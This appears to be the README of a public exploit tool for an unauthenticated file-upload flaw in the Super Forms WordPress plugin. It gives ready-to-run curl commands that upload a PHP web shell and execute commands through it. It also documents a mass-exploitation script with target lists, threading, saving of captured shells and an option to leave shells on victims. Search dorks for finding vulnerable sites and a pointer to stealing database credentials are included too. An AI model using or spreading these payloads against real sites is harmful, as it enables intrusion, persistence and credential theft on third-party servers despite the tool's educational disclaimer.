
Super Forms Unauthenticated File Upload RCE | CVSS 9.8
CVE-2026-14894 is a critical-severity (CVSS 9.8) unauthenticated arbitrary file upload vulnerability in the Super Forms – Drag & Drop Form Builder WordPress plugin (by WebRehab) versions ≤ 6.3.313.
The super_submit_form nopriv AJAX handler accepts file uploads via form submissions without:
The nonce barrier is trivially bypassed — a separate nopriv AJAX handler (super_create_nonce) generates valid nonces for any unauthenticated visitor.
Attackers upload arbitrary PHP files via Base64-encoded datauristring payloads that are written directly to /wp-content/uploads/superforms/ with the attacker-controlled filename — resulting in direct code execution.
| Version | Status |
|---|---|
| ≤ 6.3.313 | Vulnerable |
| 6.3.314+ | Patched |
Active installs: 600,000+
Discovered by: andrea bocchetti via Wordfence (July 7, 2026)
Three missing security checks in Super Forms' AJAX file upload handler:
// Vulnerable: nopriv AJAX — no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce'); // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form'); // upload for anyone
function super_submit_form() {
$data = json_decode(stripslashes($_POST['data']), true);
$file = $data['sf_upload_field']['files'][0];
$content = base64_decode($file['datauristring']); // no MIME validation
$name = $file['value']; // no filename sanitization
fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}
// Anyone can get a valid nonce — no authentication required
function super_create_nonce() {
$nonce = md5(uniqid(rand(), true));
$_SESSION['sf_nonce'] = $nonce;
echo $nonce; // returned to unauthenticated attacker
}
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
→ Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=super_submit_form
sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
"datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
"value":"shell.php"}]}}
→ Shell written to /wp-content/uploads/superforms/
3. GET /wp-content/uploads/superforms/shell.php?c=id
→ RCE confirmed
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt
# Single target
python cve_2026_14894.py -t target.com
# Mass exploit
python cve_2026_14894.py -f targets.txt
# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt
# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup
# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE results to file
--threads Concurrent workers (default: 30)
--no-cleanup Leave shells on target
--debug Show every HTTP request + stage in real-time
-v, --verbose Show detailed output
$ python cve_2026_14894.py -t target.com --debug
Super Forms | CVE-2026-14894 | CVSS 9.8
[target.com] [+] Super Forms detected v6.3.312
[target.com] [*] Nonce obtained
[target.com] [*] Uploading shell...
[target.com] [!] RCE confirmed
Host : target.com
SuperForms : YES v6.3.312
Upload : YES
RCE : YES
Shell : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
Output : uid=33(www-data) gid=33(www-data)
Time : 2.1s
Targets: 2500 | Threads: 30
[RCE] target-vuln-01.com 2.1s v6.3.312
[UP] target-patched-02.com 1.8s v6.3.314 (upload blocked)
[!] target-no-plugin-03.com 0.5s not installed
[150/2500] 6% | SuperForms:47 Upload:18 RCE:12
───────────────────────────────────────────────────────
Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12
Step 1 — Obtain nonce
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=super_create_nonce'
# Returns 96-char hex nonce
Step 2 — Upload PHP shell
NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=super_submit_form' \
-d "sf_nonce=$NONCE" \
-d 'form_id=1' \
-d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'
Step 3 — Execute commands
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'
body="wp-content/plugins/super-forms"
http.html:"super-forms"
Successful exploitation yields remote code execution as the web server user. From there:
wp-config.php → database credentialsFOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.
This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
Unauthorized access to computer systems is illegal and may violate:
- United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- Indonesia: UU ITE Pasal 30 & 46
- European Union: Directive 2013/40/EU
- United Kingdom: Computer Misuse Act 1990
The authors assume no liability for misuse.
| Resource | Link |
|---|---|
| Wordfence Advisory |
This project is not affiliated with WebRehab or Super Forms.
| wordfence.com |
| IONIX Advisory | ionix.io |
| NVD Entry | CVE-2026-14894 |
| Researcher | andrea bocchetti |